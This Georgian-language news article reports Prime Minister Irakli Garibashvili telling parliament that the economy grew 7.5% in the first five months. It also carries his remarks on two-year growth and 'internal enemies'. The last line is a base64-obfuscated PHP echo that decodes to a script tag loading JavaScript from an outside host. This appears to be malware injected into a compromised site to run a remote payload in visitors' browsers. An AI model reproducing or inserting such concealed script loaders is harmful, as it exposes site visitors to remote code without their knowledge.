celsiusi
ავერსი საქკაბელი

მაისის თვის მონაცემების მიხედვით, პირველ 5 თვეში ჩვენ გვაქვს 7,5 %-იანი ეკონომიკური ზრდა, რაც ასეთ ვითარებაში საკმაოდ ძლიერი მიღწევაა, – ამის შესახებ საქართველოს პრემიერ-მინისტრმა, ირაკლი ღარიბაშვილმა პარლამენტში, წლიური ანგარიშის წარდგენისას განაცხადა.

როგორც პრემიერ-მინისტრმა აღნიშნა, ბოლო ორი წლის განმავლობაში საქართველოს 10%-იანი ეკონომიკური ზრდა აქვს.

ირაკლი ღარიბაშვილის თქმით, ბოლო ორი წლის განმავლობაში მთავრობამ შეძლო და საქართველოს მსოფლიოში ერთ-ერთი ყველაზე სწრაფად განვითარებადი ეკონომიკა აქვს.

„დღეს გამოქვეყნდა მაისის თვის მონაცემები, რომლის შესახებაც მინდა აღვნიშნო. მაისის თვის მონაცემების მიხედვით, პირველ ხუთ თვეში ჩვენ გვაქვს 7,5%-იანი ეკონომიკური ზრდა, რაც, დამეთანხმებით, რომ ასეთ ვითარებაში საკმაოდ ძლიერი მიღწევაა. ასევე მინდა, აღვნიშნო, რომ ჩვენმა მთავრობამ შეძლო ბოლო ორი წლის განმავლობაში საქართველო გამხდარიყო მსოფლიოში ერთ-ერთი ყველაზე სწრაფად განვითარებადი ეკონომიკა. ერთ-ერთი ყველაზე სწრაფად განვითარებადი ეკონომიკა მთელს მსოფლიოში. რა თქმა უნდა, ჩვენ გვიწევს მუშაობა ვითარებაში, როცა არა მხოლოდ გარე საფრთხეები გვაქვს, არამედ შიდა საფრთხეები, შიდა მტრების დესტრუქციული ქმედებები წარმოადგენს პირდაპირ გამოწვევას, საფრთხეს ჩვენი ქვეყნისთვის, ჩვენი სტაბილურობისთვის. ის, რაც „ქართულმა ოცნებამ“ შეძლო ბოლო 10 წლის განმავლობაში, არის მართლაც უპრეცედენტო. ჩვენ გვაქვს უწყვეტი მშვიდობიანი პერიოდი, უწყვეტი სტაბილური პერიოდი, რაც არის საფუძველი სწორედ ჩვენი ქვეყნის განვითარების“, – განაცხადა პრემიერ-მინისტრმა.

284
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");